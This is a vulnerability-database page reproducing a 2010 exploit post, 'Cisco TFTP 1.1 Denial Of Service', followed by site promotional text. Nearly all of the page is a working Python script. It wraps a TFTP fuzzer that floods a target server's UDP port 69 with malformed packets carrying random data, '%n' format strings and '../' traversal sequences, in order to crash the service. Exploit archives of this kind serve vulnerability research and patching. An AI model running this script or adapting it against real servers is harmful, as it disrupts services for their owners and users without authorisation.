Lucene search
K

Cisco TFTP 1.1 Denial Of Service

🗓️ 28 Mar 2010 00:00:00Reported by SuBz3r0Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 25 Views

Security exploit in Cisco TFTP Server 1.

Code
`# Exploit Title: [Cisco TFTP Server 1.1]  
# Date: [2010-03-25]  
# Author: [_SuBz3r0_]  
# Software Link: [http://www.oldversion.com/Cisco_TFTP_Server.html]  
# Version: [1.1]  
# Tested on: [XP SP3,Win2k3]  
# CVE : [if exists]  
# Code :  
#Cisco TFTP Server v1.1 DoS  
print ""  
print "##############################################"  
print "# _SuBz3r0_ #"  
print "##############################################"  
print ""  
print "Cisco TFTP v1.1 Remote DoS"  
print "Just For Fun"  
print "tftp_fuzz.py [ip of server]"  
print ""  
print "Greetz:piloo le canari & MaX"  
print "Credits to Ilja van Sprundel"  
print "Tested on: French Windows Xp Sp3 fully Patched"  
print ""  
  
#!/usr/bin/python  
# tftpd fuzzer by Ilja van Sprundel  
# implements rfc 1350, 2090, 2347, 2348, 2349  
#  
# todo: - 1 option per packet  
# - lots (>100) (small) options per packet  
# - add better option support to OACK  
# - client fuzzing ?  
import os, socket, sys, struct, random  
port = 69  
type = ["netascii", "octet", "binary", "mail"]  
asize = ["blkzise", "tsize"]  
class fuzz:  
def __init__(self):  
""" """  
def randstring(self, len):  
thestring = ""  
what = random.randint(0,5)  
if what < 5:  
for i in range(len):  
char = chr(random.randint(1,255))  
thestring += char  
else:  
thestring = "%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n"  
return thestring  
  
def randbin(self, len):  
thestring = ""  
for i in range(len):  
char = chr(random.randint(0,255))  
thestring += char  
return thestring  
  
def fuzz_rw(self):  
""" """  
data = ""  
if not random.randint(0,50):  
return ""  
if not random.randint(0,10):  
if random.randint(0,1):  
data = "../"  
else:  
howmany = random.randint(1,100)  
data = "../" * howmany  
  
data += self.randstring(random.randint(0,3000))  
# no 0byte  
if not random.randint(0,10):  
return data  
data += "\0"  
# no mode  
if not random.randint(0,100):  
return data  
  
if random.randint(0,5):  
data += random.choice(type)  
else:  
data += self.randstring(random.randint(0,3000))  
  
if not random.randint(0,10):  
return data  
data += "\0"  
if not random.randint(0,10):  
return data  
options = random.randint(0,100)  
if not random.randint(0,10):  
breakloop = 1  
breakit = random.randint(0, options)  
else:  
breakloop = 0  
longarg = random.randint(0, options)  
if not random.randint(0,10):  
lowlimit = 16  
options = options / 4  
else:  
lowlimit = 0  
for i in range(options):  
which = random.randint(lowlimit, 19)  
if which < 16:  
if longarg == i:  
data += self.randstring(random.randint(0,3000))  
else:  
data += self.randstring(random.randint(0,100))  
data += "\0"  
data += self.randstring(random.randint(0,100))  
if which == 16:  
data += "multicast\0"  
if not random.randint(0,5):  
if random.randint(0,1):  
data += self.randstring(random.randint(0,50))  
else:  
data += str(random.randint(0, 0xffffffff))  
if which == 17 or which == 18:  
data += random.choice(asize) + "\0"  
if random.randint(0,10):  
if random.randint(0,1):  
uplimit = 65535  
else:  
uplimit = 0xffffffff  
string = str(random.randint(0, uplimit))  
if random.randint(0,1):  
data += "-"  
data += string  
else:  
data += self.randstring(random.randint(0,50))  
if which == 19:  
data += "timeout\0"  
if random.randint(0,10):  
which = random.randint(0,5)  
if which < 4:  
uplimit = 255  
if which == 4:  
uplimit = 65535  
else:  
uplimit = 0xffffffff  
string = str(random.randint(0, uplimit))  
if random.randint(0,1):  
data += "-"  
data += string  
else:  
data += self.randstring(random.randint(0,50))  
  
if breakloop:  
if i == breakit:  
return data  
data += "\0"  
  
  
return data  
  
def make_data(self):  
""" """  
which = random.randint(0,10)  
if which < 6:  
# read is more likely to be accepted then write  
# hence we bias it towards reading !  
if random.randint(0,2):  
d = "\x00\x01"  
else:  
d = "\x00\x02"  
d += self.fuzz_rw()  
# do some tftpd's do something with this ???  
elif which == 6:  
d = "\x00\x03"  
d += self.randbin(2)  
d += self.randbin(random.randint(0,3000))  
elif which == 7:  
d = "\x00\x04"  
d += self.randbin(2)  
if not random.randint(0,10):  
d += self.randbin(random.randint(0,3000))  
elif which == 8:  
d = "\x00\x05"  
d += self.randbin(2)  
d += self.randstring(random.randint(0,1000))  
if random.randint(0,10):  
d += "\0"  
elif which == 9:  
# lets do this later ....  
d = "\x00\x06"  
d += self.randbin(1000)  
else:  
if random.randint(0,2):  
times = 512  
else:  
times = random.randint(512, 10000)  
d = self.randbin(random.randint(0,times))  
return d  
  
def run(self):  
""" """  
packets = 0  
try:  
while 1:  
try:  
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)  
except:  
print "socket() failed"  
sys.exit(1)  
da = self.make_data()  
s.sendto(da, (host, port))  
s.close()  
os.write(1,".")  
packets += 1  
except KeyboardInterrupt:  
print "\nPackets: " + str(packets)  
  
if __name__ == '__main__':  
if len(sys.argv) <= 1:  
sys.exit(0)  
host = sys.argv[1]  
if len(sys.argv) >= 3:  
port = sys.argv[2]  
f = fuzz()  
f.run()  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation